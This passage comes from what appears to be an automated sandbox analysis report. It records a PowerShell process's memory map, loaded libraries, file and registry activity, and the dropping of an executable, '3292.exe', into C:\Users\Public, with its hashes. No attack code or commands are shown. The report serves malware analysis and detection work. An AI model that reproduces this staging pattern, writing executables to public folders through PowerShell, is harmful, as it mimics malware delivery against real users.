private_0x00000000029d0000 0x029d0000 0x02ad0fff Private Memory Readable, Writable True True False
private_0x0000000002ae0000 0x02ae0000 0x02aeffff Private Memory Readable, Writable True True False
private_0x0000000002af0000 0x02af0000 0x02afffff Private Memory Readable, Writable True True False
private_0x0000000002b00000 0x02b00000 0x02b0ffff Private Memory Readable, Writable True True False
private_0x0000000002b10000 0x02b10000 0x02b8ffff Private Memory Readable, Writable True True False
private_0x0000000002b90000 0x02b90000 0x1ab8ffff Private Memory Readable, Writable True False False
private_0x000000001ab90000 0x1ab90000 0x1b25ffff Private Memory Readable, Writable True True False
private_0x000000001b260000 0x1b260000 0x1b2dffff Private Memory Readable, Writable True True False
system.management.automation.dll 0x1b2e0000 0x1b5c1fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll.mui 0x1b5d0000 0x1b68ffff Memory Mapped File Readable, Writable False False False
sortkey.nlp 0x1b690000 0x1b6d0fff Memory Mapped File Readable False False False
private_0x000000001b6e0000 0x1b6e0000 0x1b7dffff Private Memory Readable, Writable True True False
mscorrc.dll 0x1b7e0000 0x1b833fff Memory Mapped File Readable True False False
private_0x000000001b840000 0x1b840000 0x1b93ffff Private Memory Readable, Writable True True False
private_0x000000001bc40000 0x1bc40000 0x1bc4ffff Private Memory Readable, Writable True True False
private_0x000000001bc50000 0x1bc50000 0x1bc5ffff Private Memory Readable, Writable True True False
private_0x000000001bcf0000 0x1bcf0000 0x1c67ffff Private Memory Readable, Writable True True False
private_0x000000001c680000 0x1c680000 0x1c7fffff Private Memory Readable, Writable True True False
private_0x000000001c680000 0x1c680000 0x1c77ffff Private Memory Readable, Writable True True False
private_0x000000001c780000 0x1c780000 0x1c7fffff Private Memory Readable, Writable True True False
private_0x000000001c870000 0x1c870000 0x1c8effff Private Memory Readable, Writable True True False
private_0x000000001c910000 0x1c910000 0x1c98ffff Private Memory Readable, Writable True True False
private_0x000000001c9e0000 0x1c9e0000 0x1ca5ffff Private Memory Readable, Writable True True False
private_0x000000001ca70000 0x1ca70000 0x1caeffff Private Memory Readable, Writable True True False
private_0x000000001caf0000 0x1caf0000 0x1cceffff Private Memory Readable, Writable True True False
system.transactions.dll 0x1e230000 0x1e278fff Memory Mapped File Readable, Writable, Executable False False False
msvcr80.dll 0x74b00000 0x74bc8fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x77260000 0x77266fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
powershell.exe 0x13f7a0000 0x13f816fff Memory Mapped File Readable, Writable, Executable False False False
culture.dll 0x642ff4a0000 0x642ff4a9fff Memory Mapped File Readable, Writable, Executable True False False
system.directoryservices.ni.dll 0x7fedf4b0000 0x7fedf644fff Memory Mapped File Readable, Writable, Executable True False False
system.management.ni.dll 0x7fedf650000 0x7fedf7bbfff Memory Mapped File Readable, Writable, Executable True False False
system.xml.ni.dll 0x7fedf7c0000 0x7fedfe64fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.management.ni.dll 0x7fedfe70000 0x7fedff87fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.utility.ni.dll 0x7fedff90000 0x7fee01a5fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.ni.dll 0x7fee01b0000 0x7fee0294fff Memory Mapped File Readable, Writable, Executable True False False
system.core.ni.dll 0x7fee02a0000 0x7fee05cdfff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.ni.dll 0x7fee05d0000 0x7fee112cfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.consolehost.ni.dll 0x7fee1130000 0x7fee11e1fff Memory Mapped File Readable, Writable, Executable True False False
system.ni.dll 0x7fee11f0000 0x7fee1c12fff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x7fee1c20000 0x7fee2afbfff Memory Mapped File Readable, Writable, Executable True False False
mscorwks.dll 0x7fee2b00000 0x7fee349cfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.wsman.management.ni.dll 0x7fee34e0000 0x7fee3589fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.security.ni.dll 0x7fee3870000 0x7fee38adfff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x7fee48c0000 0x7fee4958fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.diagnostics.ni.dll 0x7fee4960000 0x7fee49c8fff Memory Mapped File Readable, Writable, Executable True False False
mscoree.dll 0x7fef1100000 0x7fef116efff Memory Mapped File Readable, Writable, Executable True False False
system.configuration.install.ni.dll 0x7fef12c0000 0x7fef12f1fff Memory Mapped File Readable, Writable, Executable True False False
linkinfo.dll 0x7fef47a0000 0x7fef47abfff Memory Mapped File Readable, Writable, Executable False False False
shdocvw.dll 0x7fef47b0000 0x7fef47e3fff Memory Mapped File Readable, Writable, Executable False False False
shfolder.dll 0x7fef52a0000 0x7fef52a6fff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x7fef5ee0000 0x7fef5f5ffff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x7fef5f60000 0x7fef5f6efff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x7fef7210000 0x7fef7266fff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x7fefacd0000 0x7fefacdafff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x7fefad00000 0x7fefad18fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x7fefb1b0000 0x7fefb1dcfff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x7fefb930000 0x7fefb985fff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x7fefb990000 0x7fefbabbfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x7fefbb10000 0x7fefbd03fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc1a0000 0x7fefc1abfff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x7fefc380000 0x7fefc39dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefc5d0000 0x7fefc616fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefc8d0000 0x7fefc8e6fff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x7fefcdd0000 0x7fefcdf2fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefced0000 0x7fefcedefff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefcfe0000 0x7fefcfeefff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x7fefd2e0000 0x7fefd315fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd320000 0x7fefd38afff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x7fefd390000 0x7fefd3a9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7fefd3b0000 0x7fefd48afff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefd490000 0x7fefd49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefd4a0000 0x7fefd568fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefd570000 0x7fefe2f7fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefe300000 0x7fefe32dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefe330000 0x7fefe396fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x7fefe630000 0x7fefe806fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe810000 0x7fefea12fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefeb50000 0x7fefebe8fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefebf0000 0x7fefecf8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefed80000 0x7fefedf0fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefef80000 0x7feff01efff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff020000 0x7feff03efff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7feff090000 0x7feff1bcfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7feff1c0000 0x7feff296fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x7feff2a0000 0x7feff2f1fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff3b0000 0x7feff3b0fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007ff00020000 0x7ff00020000 0x7ff0002ffff Private Memory - True True False
private_0x000007ff00030000 0x7ff00030000 0x7ff0003ffff Private Memory - True True False
private_0x000007ff00040000 0x7ff00040000 0x7ff000dffff Private Memory - True True False
private_0x000007ff000e0000 0x7ff000e0000 0x7ff000effff Private Memory - True True False
private_0x000007ff000f0000 0x7ff000f0000 0x7ff0015ffff Private Memory - True True False
private_0x000007ff00160000 0x7ff00160000 0x7ff0016ffff Private Memory - True True False
private_0x000007ff00170000 0x7ff00170000 0x7ff0017ffff Private Memory - True True False
private_0x000007ff00180000 0x7ff00180000 0x7ff0018ffff Private Memory - True True False
private_0x000007ff00190000 0x7ff00190000 0x7ff0019ffff Private Memory - True True False
private_0x000007ff001a0000 0x7ff001a0000 0x7ff001affff Private Memory - True True False
private_0x000007ff001b0000 0x7ff001b0000 0x7ff001bffff Private Memory - True True False
private_0x000007ff001c0000 0x7ff001c0000 0x7ff001cffff Private Memory - True True False
private_0x000007ff001d0000 0x7ff001d0000 0x7ff001dffff Private Memory - True True False
private_0x000007ff001e0000 0x7ff001e0000 0x7ff001effff Private Memory - True True False
private_0x000007ff001f0000 0x7ff001f0000 0x7ff001fffff Private Memory - True True False
private_0x000007ff00200000 0x7ff00200000 0x7ff0020ffff Private Memory - True True False
private_0x000007ff00210000 0x7ff00210000 0x7ff0021ffff Private Memory - True True False
private_0x000007ff00220000 0x7ff00220000 0x7ff0022ffff Private Memory - True True False
private_0x000007ff00230000 0x7ff00230000 0x7ff0023ffff Private Memory - True True False
private_0x000007ff00240000 0x7ff00240000 0x7ff0024ffff Private Memory - True True False
private_0x000007ff00250000 0x7ff00250000 0x7ff0025ffff Private Memory - True True False
private_0x000007ff00260000 0x7ff00260000 0x7ff0026ffff Private Memory - True True False
private_0x000007ff00270000 0x7ff00270000 0x7ff0027ffff Private Memory - True True False
private_0x000007ff00280000 0x7ff00280000 0x7ff0028ffff Private Memory - True True False
private_0x000007ff00290000 0x7ff00290000 0x7ff0029ffff Private Memory - True True False
private_0x000007fffff00000 0x7fffff00000 0x7fffff0ffff Private Memory Readable, Writable, Executable True True False
private_0x000007fffff10000 0x7fffff10000 0x7fffff9ffff Private Memory Readable, Writable, Executable True True False
private_0x000007fffffa4000 0x7fffffa4000 0x7fffffa5fff Private Memory Readable, Writable True True False
private_0x000007fffffa6000 0x7fffffa6000 0x7fffffa7fff Private Memory Readable, Writable True True False
private_0x000007fffffa8000 0x7fffffa8000 0x7fffffa9fff Private Memory Readable, Writable True True False
private_0x000007fffffaa000 0x7fffffaa000 0x7fffffabfff Private Memory Readable, Writable True True False
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True True False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True True False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd4fff Private Memory Readable, Writable True True False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True True False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd9fff Private Memory Readable, Writable True True False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True True False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
For performance reasons, the remaining 35 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\public\3292.exe 120.00 KB (122880 bytes) MD5: ca6f2ee0e3b7218da76d126d22f707be
SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d
SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4
False
Host Behavior
File (309)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\3292.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\Public\3292.exe type = file_type True 2
Fn
Get Info C:\Users\Public\3292.exe type = file_attributes True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Registry (211)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
